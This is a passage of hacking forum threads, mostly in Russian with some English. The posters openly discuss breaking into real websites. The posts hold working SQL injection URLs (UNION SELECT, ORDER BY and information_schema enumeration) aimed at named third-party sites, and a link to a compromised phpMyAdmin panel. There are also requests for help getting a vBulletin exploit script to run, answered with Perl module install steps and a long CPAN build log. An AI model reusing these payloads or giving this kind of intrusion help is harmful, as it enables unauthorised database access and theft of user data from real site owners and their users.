i hacked one site and own its database but i can not find its http://forums.ubi.com/eve forums Registered Members: 1129865 users table can anyone please solve this problem ? http://validation.ubi.com/imagineportal/pmaPROD_WATCHOUT/db_details_structure.php?lang=en-utf-8&server=1&collation_connection=utf8_general_ci&db=imagineportal&goto=db_details.php
Пытаюсь научится юзать эксплоиты, как понятно, совсем новичок Интересует вот этот сплоит: http://forum.hackforce.ru/showpost.php?p=2241&postcount=1 Пишу в линуксовой консоли Perl путь-к-файлу-vbulletin.pl, вылезает вот такое: Can't locate IO/SOCKET.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.1 /usr/local/share/perl/5.10.1 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at /home/yaroslav/vbulletin.pl line 7. BEGIN failed--compilation aborted at /home/yaroslav/vbulletin.pl line 7. Подскажите, что надо поправить
вобщем есть запрос на выборку из таблы ibf_members символ "_"(в имени таблицы) заменяется на "ampersand#95;" и только в тех случаях, когда в строке(имя таблицы) есть "ibf_". в остальных случаях "_" проходит. Есть мысли? И как возможно это обойти? Спасибо. //пробовал с помощью подзапроса - не вышло
вот еще одна интересная и проблемная скуль: http://www.voluptuousdating.com/aid/display.html?aid=1606+order+by+9-- судя по всему выполняется 2 sql запроса к базе: http://www.voluptuousdating.com/aid/display.html?aid=1606+order+by+9-- http://www.voluptuousdating.com/aid/display.html?aid=1606+order+by+187-- есть мысли по раскрутке?
вот модуль http://cpansearch.perl.org/src/GBARR/IO-1.2301/IO/Socket.pm, качаешь его, и ложишь в папку Путь_к_Перлу\lib\IO\ потом заново пытаешься заюзать сплойт подробней уже некуда
тогда кидай модуль в один из этих путей в папку IO /etc/perl /usr/local/lib/perl/5.10.1 /usr/local/share/perl/5.10.1 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10
почему этого сайта не показывай номер? http://www.nrhz.de/flyer/beitrag.php?id=-9999 and 1=0 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--&service_menu=Termine Я попытаться изменить --,/*, предела, name_const, но не результат?
http://www.nrhz.de/flyer/beitrag.php?id=15330+and+1=0+union+select+1,2,3,4,5,6,7,8,9,aes_decrypt(aes_encrypt(version(),1),1),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 Column 10 <title>
daniel_1024 гм, набрал, вот такие ужасы: Code: yaroslav@yaroslav-desktop:~$ sudo perl -MCPAN -e shell Terminal does not support AddHistory. cpan shell -- CPAN exploration and modules installation (v1.9402) Enter 'h' for help. cpan[1]> h Display Information (ver 1.9402) command argument description a,b,d,m WORD or /REGEXP/ about authors, bundles, distributions, modules i WORD or /REGEXP/ about any of the above ls AUTHOR or GLOB about files in the author's directory (with WORD being a module, bundle or author name or a distribution name of the form AUTHOR/DISTRIBUTION) Download, Test, Make, Install... get download clean make clean make make (implies get) look open subshell in dist directory test make test (implies make) readme display these README files install make install (implies test) perldoc display POD documentation Upgrade r WORDs or /REGEXP/ or NONE report updates for some/matching/all modules upgrade WORDs or /REGEXP/ or NONE upgrade some/matching/all modules Pragmas force CMD try hard to do command fforce CMD try harder notest CMD skip testing Other h,? display this menu ! perl-code eval a perl command o conf [opt] set and query options q quit the cpan shell reload cpan load CPAN.pm again reload index load newer indices autobundle Snapshot recent latest CPAN uploads cpan[2]> install IO:Socket CPAN: Storable loaded ok (v2.20) Going to read '/home/yaroslav/.cpan/Metadata' Database was generated on Fri, 09 Jul 2010 06:27:12 GMT Running install for module 'IO::Socket' CPAN: Data::Dumper loaded ok (v2.124) 'YAML' not installed, falling back to Data::Dumper and Storable to read prefs '/home/yaroslav/.cpan/prefs' Running make for G/GB/GBARR/IO-1.25.tar.gz CPAN: Digest::SHA loaded ok (v5.47) CPAN: Compress::Zlib loaded ok (v2.02) Checksum for /home/yaroslav/.cpan/sources/authors/id/G/GB/GBARR/IO-1.25.tar.gz ok Scanning cache /home/yaroslav/.cpan/build for sizes ............................................................................DONE CPAN: Archive::Tar loaded ok (v1.52) IO-1.25/ IO-1.25/ChangeLog IO-1.25/IO.pm IO-1.25/IO.xs IO-1.25/lib/ IO-1.25/lib/IO/ IO-1.25/lib/IO/Dir.pm IO-1.25/lib/IO/File.pm IO-1.25/lib/IO/Handle.pm IO-1.25/lib/IO/Pipe.pm IO-1.25/lib/IO/Poll.pm IO-1.25/lib/IO/Seekable.pm IO-1.25/lib/IO/Select.pm IO-1.25/lib/IO/Socket/ IO-1.25/lib/IO/Socket/INET.pm IO-1.25/lib/IO/Socket/UNIX.pm IO-1.25/lib/IO/Socket.pm IO-1.25/Makefile.PL IO-1.25/MANIFEST IO-1.25/META.yml IO-1.25/poll.c IO-1.25/poll.h IO-1.25/README IO-1.25/SIGNATURE IO-1.25/t/ IO-1.25/t/IO.t IO-1.25/t/io_const.t IO-1.25/t/io_dir.t IO-1.25/t/io_dup.t IO-1.25/t/io_file.t IO-1.25/t/io_linenum.t IO-1.25/t/io_multihomed.t IO-1.25/t/io_pipe.t IO-1.25/t/io_poll.t IO-1.25/t/io_sel.t IO-1.25/t/io_sock.t IO-1.25/t/io_taint.t IO-1.25/t/io_tell.t IO-1.25/t/io_udp.t IO-1.25/t/io_unix.t IO-1.25/t/io_utf8.t IO-1.25/t/io_xs.t IO-1.25/t/test.pl CPAN: File::Temp loaded ok (v0.22) CPAN.pm: Going to build G/GB/GBARR/IO-1.25.tar.gz Checking if your kit is complete... Looks good Writing Makefile for IO Could not read '/home/yaroslav/.cpan/build/IO-1.25-BM9Gl0/META.yml'. Falling back to other methods to determine prerequisites cp lib/IO/Pipe.pm blib/lib/IO/Pipe.pm cp lib/IO/File.pm blib/lib/IO/File.pm cp lib/IO/Select.pm blib/lib/IO/Select.pm cp lib/IO/Socket/INET.pm blib/lib/IO/Socket/INET.pm cp lib/IO/Socket.pm blib/lib/IO/Socket.pm cp lib/IO/Socket/UNIX.pm blib/lib/IO/Socket/UNIX.pm cp lib/IO/Poll.pm blib/lib/IO/Poll.pm cp lib/IO/Handle.pm blib/lib/IO/Handle.pm cp lib/IO/Dir.pm blib/lib/IO/Dir.pm cp lib/IO/Seekable.pm blib/lib/IO/Seekable.pm cp IO.pm blib/lib/IO.pm /usr/bin/perl /usr/share/perl/5.10/ExtUtils/xsubpp -typemap /usr/share/perl/5.10/ExtUtils/typemap IO.xs > IO.xsc && mv IO.xsc IO.c cc -c -D_REENTRANT -D_GNU_SOURCE -DDEBIAN -fno-strict-aliasing -pipe -fstack-protector -I/usr/local/include -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -O2 -g -DVERSION=\"1.25\" -DXS_VERSION=\"1.25\" -fPIC "-I/usr/lib/perl/5.10/CORE" IO.c cc -c -D_REENTRANT -D_GNU_SOURCE -DDEBIAN -fno-strict-aliasing -pipe -fstack-protector -I/usr/local/include -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -O2 -g -DVERSION=\"1.25\" -DXS_VERSION=\"1.25\" -fPIC "-I/usr/lib/perl/5.10/CORE" poll.c Running Mkbootstrap for IO () chmod 644 IO.bs rm -f blib/arch/auto/IO/IO.so cc -shared -O2 -g -L/usr/local/lib -fstack-protector IO.o poll.o -o blib/arch/auto/IO/IO.so \ \ chmod 755 blib/arch/auto/IO/IO.so cp IO.bs blib/arch/auto/IO/IO.bs chmod 644 blib/arch/auto/IO/IO.bs Manifying blib/man3/IO::Pipe.3pm Manifying blib/man3/IO::File.3pm Manifying blib/man3/IO::Select.3pm Manifying blib/man3/IO::Socket::INET.3pm Manifying blib/man3/IO::Socket.3pm Manifying blib/man3/IO::Socket::UNIX.3pm Manifying blib/man3/IO::Poll.3pm Manifying blib/man3/IO::Handle.3pm Manifying blib/man3/IO::Dir.3pm Manifying blib/man3/IO::Seekable.3pm Manifying blib/man3/IO.3pm GBARR/IO-1.25.tar.gz /usr/bin/make -- OK Warning (usually harmless): 'YAML' not installed, will not store persistent state Running make test PERL_DL_NONLAZY=1 /usr/bin/perl "-MExtUtils::Command::MM" "-e" "test_harness(0, 'blib/lib', 'blib/arch')" t/*.t t/IO.t ............. ok t/io_const.t ....... ok t/io_dir.t ......... ok t/io_dup.t ......... ok t/io_file.t ........ ok t/io_linenum.t ..... ok t/io_multihomed.t .. ok t/io_pipe.t ........ ok t/io_poll.t ........ ok t/io_sel.t ......... ok t/io_sock.t ........ ok t/io_taint.t ....... ok t/io_tell.t ........ ok t/io_udp.t ......... ok t/io_unix.t ........ ok t/io_utf8.t ........ ok t/io_xs.t .......... ok All tests successful. Files=17, Tests=180, 22 wallclock secs ( 0.06 usr 0.02 sys + 0.40 cusr 0.09 csys = 0.57 CPU) Result: PASS GBARR/IO-1.25.tar.gz /usr/bin/make test -- OK Warning (usually harmless): 'YAML' not installed, will not store persistent state Running make install Prepending /home/yaroslav/.cpan/build/IO-1.25-BM9Gl0/blib/arch /home/yaroslav/.cpan/build/IO-1.25-BM9Gl0/blib/lib to PERL5LIB for 'install' Files found in blib/arch: installing files in blib/lib into architecture dependent library tree Installing /usr/local/lib/perl/5.10.1/auto/IO/IO.so Appending installation info to /usr/local/lib/perl/5.10.1/perllocal.pod GBARR/IO-1.25.tar.gz /usr/bin/make install -- OK Warning (usually harmless): 'YAML' not installed, will not store persistent state cpan[3]> Сплоит использовать по прежнему не получается(
Всем привет! Обнаружилась на одном ресурсе уязвимость. Проведя SQL injection удалось с помощью функций MySQL user() и database() узнать, соответственно, имя пользователя и базы в СУБД: Code: http://example.com/detail.php?id=-1+UNION+SELECT+1,user(),3,4,5+--+ Code: http://example.com/detail.php?id=-1+UNION+SELECT+1,database(),3,4,5+--+ Далее, используя переведенное в hex полученное имя БД, я предпринял попытку выудить имена таблиц запросом к INFORMATION_SCHEMA: Code: http://example.com/detail.php?id=-1+UNION+SELECT+1,table_name,3,4,5+from+information_schema.tables+where+table_schema=0x643630363138313039+--+ Ничто не предвещало сложностей, но результат я так и не получил. Любые запросы к базе с метаданными сопровождаются непонятной длительной загрузкой данных с сервера и успешной (код 200) выдачей пустой HTML-страницы. Доступ к INFORMATION_SCHEMA есть - отработал запрос Code: http://example.com/detail.php?id=-1+UNION+SELECT+1,GRANTEE,3,4,5+FROM+INFORMATION_SC HEMA.USER_PRIVILEGES+--+[/u] и выдал мне идентификатор пользователя. Пробовал указывать LIMIT 1 - результат тот же. Кстати, хотел посмотреть COUNT(*) - то же самое. Версия MySQL-сервера 5.0.77-log. Кто сталкивался с подобным? Какие будут советы? Рекомендации? Спасибо за любые подсказки!
